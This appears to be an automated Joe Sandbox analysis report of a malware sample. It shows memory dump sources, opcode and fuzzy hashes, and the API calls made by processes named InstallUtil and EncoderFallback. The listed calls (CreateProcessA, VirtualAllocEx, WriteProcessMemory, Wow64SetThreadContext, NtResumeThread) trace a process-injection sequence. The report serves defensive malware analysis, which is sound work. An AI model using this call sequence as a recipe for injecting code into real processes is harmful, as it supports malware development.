                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_b70000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: e9edaad332e03a35c821661f7680eb3ea820606ea7973562a3a7b0b1848c3d75
                                                                                          • Instruction ID: 2635a1091646c1a6749a7f45b5a737e842848f7f245c9f979856f776fbb602d4
                                                                                          • Opcode Fuzzy Hash: e9edaad332e03a35c821661f7680eb3ea820606ea7973562a3a7b0b1848c3d75
                                                                                          • Instruction Fuzzy Hash: C8317070E442498BDB25CF64C4947AEB7F6EF59304F20C4A5E81AEB290EF719C42CB50
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2753774248.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_b70000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: c2f808976e1bfb3ad17dc44f9e2ec0f237593c8593283981f37377639626c775
                                                                                          • Instruction ID: 9cad4c7e6785a42a3912e917cfff7ac375c0f8222849b62272e8262384230b13
                                                                                          • Opcode Fuzzy Hash: c2f808976e1bfb3ad17dc44f9e2ec0f237593c8593283981f37377639626c775
                                                                                          • Instruction Fuzzy Hash: D3411F30201943CFD605FF68F898A563B73FBDA30570059A9E1145B2BAE7A0A909DB81
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2753774248.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_b70000_InstallUtil.jbxd
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2752079108.000000000095D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0095D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_95d000_InstallUtil.jbxd
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2753098880.0000000000AAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AAD000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_aad000_InstallUtil.jbxd
                                                                                          • Opcode ID: 5b9a6d2c0c10faa9ccd5d6f95e78104ac1c470805db7f7df581da1898467df30
                                                                                          • Instruction ID: 27237e9b9b5b49a4dce9ad91bb9460697e183e0bfb00295f5fb8fc14bfba9c2e
                                                                                          • Opcode Fuzzy Hash: 5b9a6d2c0c10faa9ccd5d6f95e78104ac1c470805db7f7df581da1898467df30
                                                                                          • Instruction Fuzzy Hash: 72111838A44155CFC758DBB8E948A5D7BF2EF89315B2444D8E4068B7B5CF309D92CB41
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2753774248.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_b70000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 6a75c5b7f1dd6229af9a0b4db9c79ef6c24e272c2ebca4333143cb88bef53fd0
                                                                                          • Instruction ID: e201fe9f9bd269d48f1036ac33b18631e834e7c7608eceb320b5cb08dfe87979
                                                                                          • Opcode Fuzzy Hash: 6a75c5b7f1dd6229af9a0b4db9c79ef6c24e272c2ebca4333143cb88bef53fd0
                                                                                          • Instruction Fuzzy Hash: B301D231A002048BDB44EF65D94579EBBB5EF84301F64C264C90C5F29AE7709E05CBA1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2753774248.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_b70000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: f34db3d313df0fecacf670083bbd91a873c5414427355d476f8e46fcbca9aa7a
                                                                                          • Instruction ID: ebf9fb69937fe554c1565ef2ea1142db51218796a6c324209ec3eef9a2f3694f
                                                                                          • Opcode Fuzzy Hash: f34db3d313df0fecacf670083bbd91a873c5414427355d476f8e46fcbca9aa7a
                                                                                          • Instruction Fuzzy Hash: 120188305042CADFDB07EBB8F89169D7BB1EF82340F1045ECC4414B196EE716A06D782
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2753774248.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_b70000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a3f9a729b0dcfe7177273cdaec3fa6a81ea0175170c2a5dea8c6f6f4afc93b0f
                                                                                          • Instruction ID: 6c36905ea4298880ae9dc39e20787a8bfd26ee2253c9933c883ffa2b47017124
                                                                                          • Opcode Fuzzy Hash: a3f9a729b0dcfe7177273cdaec3fa6a81ea0175170c2a5dea8c6f6f4afc93b0f
                                                                                          • Instruction Fuzzy Hash: CFF03C30A1024EDFDB06FBB8F89169DBBB2EB85340F5045A8C5049B254EE706E059B92
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2753774248.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_b70000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 98b9e97b2a7c2b76746953ed3310fe735421b4f0c7bf1186913bee7e0fb1e3d7
                                                                                          • Instruction ID: b66ce87d457690fa59723073062fd579c085be515971b073e2a9bb153a2b0285
                                                                                          • Opcode Fuzzy Hash: 98b9e97b2a7c2b76746953ed3310fe735421b4f0c7bf1186913bee7e0fb1e3d7
                                                                                          • Instruction Fuzzy Hash: 12C08029544144C5C75442D87C043DC3B64C781325F1004D5D11841C50477009F98691

                                                                                          Execution Graph

                                                                                          Execution Coverage:6.9%
                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                          Signature Coverage:5.3%
                                                                                          Total number of Nodes:171
                                                                                          Total number of Limit Nodes:5

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2753371991.0000000001230000.00000040.00000800.00020000.00000000.sdmp, Offset: 01230000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_1230000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Ehq"
                                                                                          • API String ID: 0-672064728

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 419 5d35ea0-5d35f3e NtProtectVirtualMemory 422 5d35f40-5d35f46 419->422 423 5d35f47-5d35f6c 419->423 422->423
                                                                                          APIs
                                                                                          • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 05D35F31
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2774786006.0000000005D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_5d30000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID: MemoryProtectVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 2706961497-0

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 427 5d35ea8-5d35f3e NtProtectVirtualMemory 430 5d35f40-5d35f46 427->430 431 5d35f47-5d35f6c 427->431 430->431
                                                                                          APIs
                                                                                          • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 05D35F31
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2774786006.0000000005D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_5d30000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID: MemoryProtectVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 2706961497-0
                                                                                          APIs
                                                                                          • NtResumeThread.NTDLL(?,?), ref: 05D36F4E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2774786006.0000000005D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_5d30000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID: ResumeThread
                                                                                          • String ID:
                                                                                          • API String ID: 947044025-0
                                                                                          APIs
                                                                                          • NtResumeThread.NTDLL(?,?), ref: 05D36F4E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2774786006.0000000005D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_5d30000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID: ResumeThread
                                                                                          • String ID:
                                                                                          • API String ID: 947044025-0
                                                                                          • Opcode ID: 22034192c73a3c89fd9bd33096db715aaca6ac3d45dc0805f55df1a4dc522943
                                                                                          • Instruction ID: a8fa65b03762aca0cc685daea3a4ca5685b163237e283ecba776bb5e7d43b1bf
                                                                                          • Opcode Fuzzy Hash: 22034192c73a3c89fd9bd33096db715aaca6ac3d45dc0805f55df1a4dc522943
                                                                                          • Instruction Fuzzy Hash: 3E1114B1D043499FDB10DFAAC485B9EFBF4BF88214F10842AD519A7240CB78A904CFA5
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2753371991.0000000001230000.00000040.00000800.00020000.00000000.sdmp, Offset: 01230000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_1230000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: dbada1cc526269fef4eaa91b4b96f1d2dc182ee2702ef4f8fc269573cc7a570f
                                                                                          • Instruction ID: 68f55b192e2e9b72a9c922638f07e2344dabc6e0799ff83ef4cecfd683cf2432
                                                                                          • Opcode Fuzzy Hash: dbada1cc526269fef4eaa91b4b96f1d2dc182ee2702ef4f8fc269573cc7a570f
                                                                                          • Instruction Fuzzy Hash: EC426974B10209CFDB15DF29C494A6A7BF6BFC9310B1284A9E606CB3A5DB31EC46CB51
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2774733132.0000000005D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_5d20000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:

                                                                                          Control-flow Graph
                                                                                          • Graph not reproduced. First block: 5d23700-5d2374a; calls at 5d2374d to 5d36d30 and 5d36d29.
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2774733132.0000000005D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_5d20000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: %$/
                                                                                          • API String ID: 0-2617147878

                                                                                          Control-flow Graph
                                                                                          • Graph not reproduced. First block: 5d36505-5d36580; API call: CreateProcessA (block 5d36685-5d366fa).
                                                                                          APIs
                                                                                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 05D366EA
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2774786006.0000000005D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_5d30000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateProcess
                                                                                          • String ID:
                                                                                          • API String ID: 963392458-0

                                                                                          Control-flow Graph
                                                                                          • Graph not reproduced. First block: 5d36510-5d36580; API call: CreateProcessA (block 5d36685-5d366fa).
                                                                                          APIs
                                                                                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 05D366EA
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2774786006.0000000005D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_5d30000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateProcess
                                                                                          • String ID:
                                                                                          • API String ID: 963392458-0

                                                                                          Control-flow Graph
                                                                                          • Graph not reproduced. First block: 5d36d29-5d36d7e; API call: WriteProcessMemory (block 5d36d8e-5d36dcd).
                                                                                          APIs
                                                                                          • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 05D36DC0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2774786006.0000000005D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_5d30000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID: MemoryProcessWrite
                                                                                          • String ID:
                                                                                          • API String ID: 3559483778-0

                                                                                          Control-flow Graph
                                                                                          • Graph not reproduced. First block: 5d36d30-5d36d7e; API call: WriteProcessMemory (block 5d36d8e-5d36dcd).
                                                                                          APIs
                                                                                          • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 05D36DC0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2774786006.0000000005D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_5d30000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID: MemoryProcessWrite
                                                                                          • String ID:
                                                                                          • API String ID: 3559483778-0

                                                                                          Control-flow Graph
                                                                                          • Graph not reproduced. First block: 5d36808-5d3685b; API call: Wow64SetThreadContext (block 5d3686b-5d3689b).
                                                                                          APIs
                                                                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 05D3688E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2774786006.0000000005D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_5d30000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID: ContextThreadWow64
                                                                                          • String ID:
                                                                                          • API String ID: 983334009-0

                                                                                          Control-flow Graph
                                                                                          • Graph not reproduced. First block: 5d36810-5d3685b; API call: Wow64SetThreadContext (block 5d3686b-5d3689b).
                                                                                          APIs
                                                                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 05D3688E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2774786006.0000000005D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_5d30000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID: ContextThreadWow64
                                                                                          • String ID:
                                                                                          • API String ID: 983334009-0

                                                                                          Control-flow Graph
                                                                                          • Graph not reproduced. First block: 5d37118-5d371a1; API call: VirtualProtect.
                                                                                          APIs
                                                                                          • VirtualProtect.KERNEL32(?,?,?,?), ref: 05D37194
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2774786006.0000000005D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_5d30000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID: ProtectVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 544645111-0

                                                                                          Control-flow Graph
                                                                                          • Graph not reproduced. First block: 5d32108-5d3218c; API call: SleepEx.
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2774786006.0000000005D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_5d30000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID: Sleep
                                                                                          • String ID:
                                                                                          • API String ID: 3472027048-0

                                                                                          Control-flow Graph
                                                                                          • Graph not reproduced. First block: 5d37120-5d371a1; API call: VirtualProtect.
                                                                                          APIs
                                                                                          • VirtualProtect.KERNEL32(?,?,?,?), ref: 05D37194
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2774786006.0000000005D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_5d30000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID: ProtectVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 544645111-0

                                                                                          Control-flow Graph
                                                                                          • Graph not reproduced. First block: 5d36c28-5d36cab; API call: VirtualAllocEx.
                                                                                          APIs
                                                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05D36C9E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2774786006.0000000005D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_5d30000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 4275171209-0
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2774786006.0000000005D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D30000, based on PE: false
                                                                                          • API ID: Sleep
                                                                                          APIs
                                                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05D36C9E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2774786006.0000000005D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D30000, based on PE: false
                                                                                          • API ID: AllocVirtual
                                                                                          • API String ID:
                                                                                          • Opcode ID: fd5313ab34fc26410fdcf461a0e97a03f4b3046410359705cd4abc2c5e19beb3
                                                                                          • Instruction ID: 67b4a2c9fb601bc7197e7b27bdf01c94f9f9ea6a1fee1ee9274900e0fc04bd5f
                                                                                          • Opcode Fuzzy Hash: fd5313ab34fc26410fdcf461a0e97a03f4b3046410359705cd4abc2c5e19beb3
                                                                                          • Instruction Fuzzy Hash: A6416770E04218CFDB04EFA9E548BADBBF2FB49318F10906AD149BB654CB749985CF00
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2774733132.0000000005D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_5d20000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 865c3925b4055b4a444b659ccae748856bd018c9bdeab52c272792513943a600
                                                                                          • Instruction ID: 3b58d9dbb36ef48bd8a164bb7e697809eb089de41d75367ead3a5231899b0cb6
                                                                                          • Opcode Fuzzy Hash: 865c3925b4055b4a444b659ccae748856bd018c9bdeab52c272792513943a600
                                                                                          • Instruction Fuzzy Hash: 49413570E08228CFDB14DFA9D5487EDBBF2FB5A319F10906AD149AB264D7749885CF00
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2753371991.0000000001230000.00000040.00000800.00020000.00000000.sdmp, Offset: 01230000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_1230000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: acc6c73d436f62dc2869431537ec9af85f9f65d611b860fe0255fece370e64b2
                                                                                          • Instruction ID: 161b270893522d1bb549a579604f690c96560a7d971865b0af7f071db77e7a97
                                                                                          • Opcode Fuzzy Hash: acc6c73d436f62dc2869431537ec9af85f9f65d611b860fe0255fece370e64b2
                                                                                          • Instruction Fuzzy Hash: 3B412974B101049FCB44EFB8D498AADBBF2AF8C710B258469E906EB361CE709C01CB55
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2774733132.0000000005D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_5d20000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 61944b1e06c133f63be5b409a867fce583c738bac2f4c0cce1fae1c70cea2cd3
                                                                                          • Instruction ID: 74cbd2ffe813ee06cfff822f9d227f9c5e3a38e2ba16ba96e43c222cfe578fd9
                                                                                          • Opcode Fuzzy Hash: 61944b1e06c133f63be5b409a867fce583c738bac2f4c0cce1fae1c70cea2cd3
                                                                                          • Instruction Fuzzy Hash: 0D318870E04218CFCB04EFA9D5487EDBBF2FB5A319F10906AD049AB664CB748989CF00
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2753371991.0000000001230000.00000040.00000800.00020000.00000000.sdmp, Offset: 01230000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_1230000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 0ee6128b2e40e2863be349fa1d7ec0f69a7bcaa92c48a923b7f4925096f8b79e
                                                                                          • Instruction ID: 3e5011790d9b7372cd92e51578a598702a931af2d8071086def18caf4c51820d
                                                                                          • Opcode Fuzzy Hash: 0ee6128b2e40e2863be349fa1d7ec0f69a7bcaa92c48a923b7f4925096f8b79e
                                                                                          • Instruction Fuzzy Hash: DE3136B0D11249EFDB14CFA9D490AEEBFF5BF88300F248029E909AB350CB349941CB50
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2774733132.0000000005D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_5d20000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 76427b7e357f4cc806bbe20514cf255c4618e2c3652db477a4fe9644716e8bc3
                                                                                          • Instruction ID: c7f801ad24810546fb4df29483c3bd88130cca395255289cd3312776a5840fb3
                                                                                          • Opcode Fuzzy Hash: 76427b7e357f4cc806bbe20514cf255c4618e2c3652db477a4fe9644716e8bc3
                                                                                          • Instruction Fuzzy Hash: 84318B70E08219DBDB04DFA8D9487BEBBF6FB89308F1080AAD515B7385D7359A05CB90
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2753371991.0000000001230000.00000040.00000800.00020000.00000000.sdmp, Offset: 01230000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_1230000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 8a43db5acef39c7d27d7c98168f7d6816881d345b982574c24981dc185a31b5e
                                                                                          • Instruction ID: 1f77f257c6eeab68e3e98de6e4a185623f976b8ce6cf0c6826a34fa42722550f
                                                                                          • Opcode Fuzzy Hash: 8a43db5acef39c7d27d7c98168f7d6816881d345b982574c24981dc185a31b5e
                                                                                          • Instruction Fuzzy Hash: 6A3128B0D11249EFDB14CFA9D590ADEBFF5BF48740F248429E509AB354DB349941CBA0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2752777016.00000000011ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 011ED000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11ed000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 27745b1a3699e8ded400a08e3eb419fb77531abd9f0c2b5282056bbd65a0eaf5
                                                                                          • Instruction ID: 25ca3bad39c9a13b0f5cebdf272e9486cd8f5de8e0b83d0a8f59b45476aa4422
                                                                                          • Opcode Fuzzy Hash: 27745b1a3699e8ded400a08e3eb419fb77531abd9f0c2b5282056bbd65a0eaf5
                                                                                          • Instruction Fuzzy Hash: 76318D7150D7C49FCB07CF64D994715BFB1AB46210F2981DBD9848F2A3C33A981ACBA2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2752439514.0000000000EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EBD000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_ebd000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 244e91a2f97bca82df35fcb65c29ac5ff4be7b7816d87eda9dd2a7a16c1a99a8
                                                                                          • Instruction ID: 521f3620df8271d67072b70f904d0652c5f196be22e4288e2098577992f0f518
                                                                                          • Opcode Fuzzy Hash: 244e91a2f97bca82df35fcb65c29ac5ff4be7b7816d87eda9dd2a7a16c1a99a8
                                                                                          • Instruction Fuzzy Hash: 8A214572508200EFCB21DF14DDC0BA7BF65FB88318F20C169E9091B256D336D856CAA2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2752777016.00000000011ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 011ED000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11ed000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: e00104434983c98e2c6a0c268fd39effb4b7d8591f0ab271023fd7377a81995f
                                                                                          • Instruction ID: 655cf81533e8640f10074b15ddc8b4bb315aa3a0c856b7e4d23b00254531c7c6
                                                                                          • Opcode Fuzzy Hash: e00104434983c98e2c6a0c268fd39effb4b7d8591f0ab271023fd7377a81995f
                                                                                          • Instruction Fuzzy Hash: 26210A71504644DFDF19DF94E9C8B16BFA5FB84314F24C56DD9050B246C336D406CBA2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2774733132.0000000005D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_5d20000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 70d71e762672eef6b1d5fa84230b0613bb6468e0a017945e45025343bf936985
                                                                                          • Instruction ID: beffb1f3e7188d74a5c781307612cb6d0fedc70c712392ee8b9f35a9c6d477fe
                                                                                          • Opcode Fuzzy Hash: 70d71e762672eef6b1d5fa84230b0613bb6468e0a017945e45025343bf936985
                                                                                          • Instruction Fuzzy Hash: 59218970E48219DFDB04DFA9D9087AEBBF6FB89304F10806AD515B3285DB749A04CB90
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2753371991.0000000001230000.00000040.00000800.00020000.00000000.sdmp, Offset: 01230000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_1230000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a97d058f843dff9a0c8e2f5c84d2998cfb09981d15c4052d88569ffe5a26822d
                                                                                          • Instruction ID: 87c2f0442b64e3488f901ffeb21969932732dc8abc2740075f966298aed523c2
                                                                                          • Opcode Fuzzy Hash: a97d058f843dff9a0c8e2f5c84d2998cfb09981d15c4052d88569ffe5a26822d
                                                                                          • Instruction Fuzzy Hash: 29211AB0915218DFEB44DFA8D5497ADFBF5EB8A304F5081A5D519A3341DBB44A84CB01
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2753371991.0000000001230000.00000040.00000800.00020000.00000000.sdmp, Offset: 01230000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
